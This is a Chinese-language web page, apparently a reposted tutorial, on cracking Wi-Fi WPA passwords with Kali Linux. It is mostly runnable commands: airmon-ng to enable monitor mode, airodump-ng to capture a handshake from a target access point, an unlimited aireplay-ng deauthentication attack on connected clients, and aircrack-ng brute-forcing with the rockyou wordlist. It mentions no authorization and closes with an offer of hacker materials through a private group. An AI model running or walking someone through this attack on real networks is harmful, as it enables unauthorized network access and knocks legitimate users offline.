当前位置:首页阅读

暴力破解WIFI密码

暴力破解WIFI密码

暴力

暴力破解WIFI密码

使用kali破解wifi密码,如果kali安装在虚拟机,需要一个外置usb网卡。

0x02 开始

查看插入的网卡

打开kali虚拟机,插入USB无线网卡,打开终端

iwconfig

暴力破解WIFI密码_WWW.XUNWANGBA.COM

查看无线网卡

airmon-ng

上面命令列出了支持监控模式的无线网卡。

如果没有任何输出,表示无线网卡不支持监控模式。

暴力破解WIFI密码_WWW.XUNWANGBA.COM

开启网卡监听模式,记录Interface名称,杀掉其他使用WiFi进程

airmon-ng start wlan0

如果有下图提示表示有其他网卡处于监控模式。

使用

airmon-ng check kill

结束其他使用WIFI进程

在执行

airmon-ng start wlan0

记住interface名称。

暴力破解WIFI密码_WWW.XUNWANGBA.COM

暴力破解WIFI密码_WWW.XUNWANGBA.COM

暴力破解WIFI密码_WWW.XUNWANGBA.COM

扫描信号

airodump-ng wlan0mon

暴力破解WIFI密码_WWW.XUNWANGBA.COM

PWR是信号强度,数字越小越好

Data是对应的路由器的在线数据吞吐量,数字越大,数据上传量越大。

CH是对应路由器的所在信道

ESSID是对应路由器的名称

找到目标后,ctrl + c 中止

抓取握手包

airodump-ng -c 11 -w ./test --bssid 78:44:FD:83:0B:2C wlan0mon

airodump-ng -c AP的信道 -w 抓取握手包的存放位置名称 --bssid AP的MAC地址 你的的Interface名称

暴力破解WIFI密码_WWW.XUNWANGBA.COM

解除认证攻击

保持上一个terminal窗口的运行状态,打开一个新的terminal,进行解除认证攻击

强制连接到wifi的设备重新连接路由器,掉线设备重连后,

如图所示位置显示WPA handshake --即成功抓取到握手包。

两个terminal使用ctrl+c终止攻击和握手抓包。

aireplay-ng -0 0 -a 9C:A6:15:D0:04:C9 -c D8:32:E3:A7:B9:6F wlan0mon

aireplay-ng -攻击模式,我们这里使用 解除认证攻击(数字0) [攻击次数,0为无限攻击] -a AP端的MAC地址 -c 客户端端的MAC地址 interface名称

暴力破解WIFI密码_WWW.XUNWANGBA.COM

暴力破解WIFI密码_WWW.XUNWANGBA.COM

关闭无线网卡的监听模式

airmon-ng stop wlan0mon

使用字典暴力破解

kali下自带一份无线密码字典 –/usr/share/wordlists/rockyou.txt.gz

解压:

gzip -d /usr/share/wordlists/rockyou.txt.gz

暴力破解WIFI密码_WWW.XUNWANGBA.COM

aircrack-ng-w/usr/share/wordlists/rockyou.txt-bBC:46:99:3D:66:D6 tplink-01.cap

#-w指定 密码字典 -b指定路由器的MAC地址

爆破成功后,如图区域位置显示KEY FOUND!字样,中括里为AP端的密码。

暴力破解WIFI密码_WWW.XUNWANGBA.COM

over!

转自:

进内部交流群,领黑客资料,可私信我

暴力破解WIFI密码_WWW.XUNWANGBA.COM

以上就是(暴力破解WIFI密码)全部内容,收藏起来下次访问不迷路!